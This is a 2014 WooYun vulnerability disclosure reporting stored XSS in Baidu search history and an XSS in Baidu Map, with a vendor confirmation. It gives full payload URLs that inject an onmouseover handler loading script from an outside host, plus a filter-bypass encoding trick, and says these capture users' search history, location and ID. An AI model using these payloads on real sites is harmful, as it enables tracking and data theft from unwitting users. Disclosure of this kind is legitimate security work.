当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-073801

漏洞标题:百度搜索存储型XSS漏洞

相关厂商:百度

漏洞作者: q601333824

提交时间:2014-08-25 17:37

修复时间:2014-10-09 17:38

公开时间:2014-10-09 17:38

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:3

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-08-25: 细节已通知厂商并且等待厂商处理中
2014-08-25: 厂商已经确认,细节仅向厂商公开
2014-09-04: 细节向核心白帽子及相关领域专家公开
2014-09-14: 细节向普通白帽子公开
2014-09-24: 细节向实习白帽子公开
2014-10-09: 细节向公众公开

简要描述:

百度搜索存储型XSS漏洞

详细说明:

1.在百度搜索的东西,会在百度个人中心留下搜索历史记录
2.所以我在百度搜索

http://www.baidu.com/s?wd=%22onmouseover =%22var%20s=document.create%26%2369%3blement('script');s.src='http://fripside.sinaapp.com/';document.body.append%26%2367%3bhild(s);%22




3.在个人中心会留下记录,会出现XSS漏洞,如图

QQ截图20140825152530.png



4.上面连接,会把大写字母转换到小写字母,控制台会报错,如图

报错.png


5.因为下面图上两个本来应该大写的字母变成小写字母了

原因.png


6.所以要把大写B和大写C,转码之就不会报错了

B → B → %26%2366%3b


C → C → %26%2367%3b


-----------------------------------------------------------------------------------

7.这个是self XSS吗??百度搜索每天用的人那么多,如果乱七八糟的网站,强制你搜索这段代码,就不是跨自己了.如果网站这样呢,如图

如果.png


------------------------------------------------------------------------------------------
8.这里顺便也提交个百度地图另外一边的XSS漏洞,就不会废话了,直接上连接

http://map.baidu.com/?newmap=1&shareurl=1&l=15&tn=B_NORMAL_MAP&c=13376526,3516728&i=0,1,1&s=bt%26bttp%3D0%26c%3D179%26sy%3D0%26en%3D1%24%24d506b2fea993829688b988e8%24%2413373701.000000%2C3516044.000000%24%24%E8%A5%BF%E6%B9%96%E5%8C%BA'onmouseover%253d%22var%20e%253ddocument.createElement('script');e.setAttribute('src','http://fripside.sinaapp.com/aaaaaa.js');document.body.appendChild(e)%22style%253d%22font-size:999px;cursor:%20default%20!important;%24%24%24%24%24%24%26sn%3D1%24%24f9fd6062990a5b1e0f0e6be9%24%2413379295.000000%2C3516515.000000%24%24%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%24%24%24%24%24%24%26sq%3D%E8%A5%BF%E6%B9%96%E5%8C%BA%26eq%3D%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%26exptype%3Ddep%26exptime%3D2014-08-23%2004%3A10%26version%3D5


9.访问之后把鼠标移到左边就会获取地理位置和用户ID

map.png

漏洞证明:

1.百度个人中心XSS代码

http://www.baidu.com/s?wd=%22onmouseover =%22var%20s=document.create%26%2369%3blement('script');s.src='http://fripside.sinaapp.com/';document.body.append%26%2367%3bhild(s);%22


QQ截图20140825152530.png


2.百度地图XSS

http://map.baidu.com/?newmap=1&shareurl=1&l=15&tn=B_NORMAL_MAP&c=13376526,3516728&i=0,1,1&s=bt%26bttp%3D0%26c%3D179%26sy%3D0%26en%3D1%24%24d506b2fea993829688b988e8%24%2413373701.000000%2C3516044.000000%24%24%E8%A5%BF%E6%B9%96%E5%8C%BA'onmouseover%253d%22var%20e%253ddocument.createElement('script');e.setAttribute('src','http://fripside.sinaapp.com/aaaaaa.js');document.body.appendChild(e)%22style%253d%22font-size:999px;cursor:%20default%20!important;%24%24%24%24%24%24%26sn%3D1%24%24f9fd6062990a5b1e0f0e6be9%24%2413379295.000000%2C3516515.000000%24%24%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%24%24%24%24%24%24%26sq%3D%E8%A5%BF%E6%B9%96%E5%8C%BA%26eq%3D%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%26exptype%3Ddep%26exptime%3D2014-08-23%2004%3A10%26version%3D5


map.png


修复方案:

百度个人中心虽然无法获取到cook,但是可以获取用户的搜索历史记录,百度地图虽然获取不到cook,但是可以获取ID对应所在地点
1.百度个人中心因为双引号被过滤,百度地图因为单引号没过滤,百度地图,前两次修复,只是修复了输出点,不是我吹牛,治标不治本,过滤方式会导致出现同样的问题

版权声明:转载请注明来源 q601333824@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2014-08-25 21:52

厂商回复:

感谢提交,我们已联系业务部门处理此问题。

最新状态:

暂无